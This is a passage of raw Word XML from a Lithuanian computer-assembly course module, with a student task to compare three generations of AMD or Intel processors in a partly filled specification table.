        <w:t>Visas dokumentacijas, planus, topologijas pateikti viename dokumente</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kaip tinklo projektą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7634F3B6" w14:textId="051A6CE8" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C81A892" w14:textId="051A6CE8" w:rsidR="00A279B4" w:rsidRPr="005A5C28" w:rsidRDefault="00A279B4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D18CD36" w14:textId="74132D00" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Kompiuterių surinkimas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B856C67" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="489C98D0" w14:textId="66D6CEC8" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PALYGINTI TRIJŲ KARTŲ PROCESORIUS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9F44E5" w14:textId="1D169F44" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Palyginkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">trijų kartų vieno gamintojo procesorius Intel arba AMD </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ir </w:t>
      </w:r>
      <w:r w:rsidR="00FF3565" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pateikite</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> jų glaustas</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>charakteristikas (</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">pvz., </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>AMD RYZEN 7 5800XT, AMD RYZEN 7 3800XT ir AMD RYZEN 7 2700X</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>agal pateiktą apačioje</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pavyzdį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sudarykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>lentelę ir,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>remdamiesi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>surinkta informacija apie</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pasirinktus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>procesorius,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rašy</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite joje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>išvadas</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> bei apibendrinim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6"/>
        <w:gridCol w:w="2478"/>
        <w:gridCol w:w="2484"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7BDD5782" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="538B2ACF" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Procesoriaus modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1CF63AE4" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD RYZEN 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D3E01B0" w14:textId="618955CF" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3800XT</w:t>
            </w:r>
            <w:r w:rsidR="5D07325C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> arba Intel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="55E1C6C0" w14:textId="2CD4B63A" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="12881B2F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD arba Intel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7E180DFB" w14:textId="50AC1391" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">AMD </w:t>
            </w:r>
            <w:r w:rsidR="3BD5F6FF" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>arba Intel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2BD1F716" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="757303D8"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Technologija</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="58676BC8"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TSMC 7nm FinFET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="129EAA4E"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6BF83339"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="50FAEC93" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3100D7B1"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Architektūra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="085F6CD5"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Zen2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4FDEDE73" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3408CF06" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="403222AE" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4552A39C"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Lizdas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0E5B7A35"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AM4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="666BF142" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="56135F0C" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7AF6D05B" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5E694673"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Branduolių/gijų</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="07C0906F"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8/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="01719FF6" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7F12453A" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6DD5109D" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="69A43C66"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Taktinis dažnis (Turbo Boost)GHz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5CAE134F"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3.9GHz/ 4.5GHz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1D279A03" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="134C368A" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0544CC65" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="21EB57FD"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Atminties cache [L3] talpa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5C9B4F9D"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32MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4D4A178C" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2E7623B6" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3B260803" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B61F8E9"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Valdiklis PCI Express 3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3896E1A8"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PCIe 4.0 x16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0F5BA9CC" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
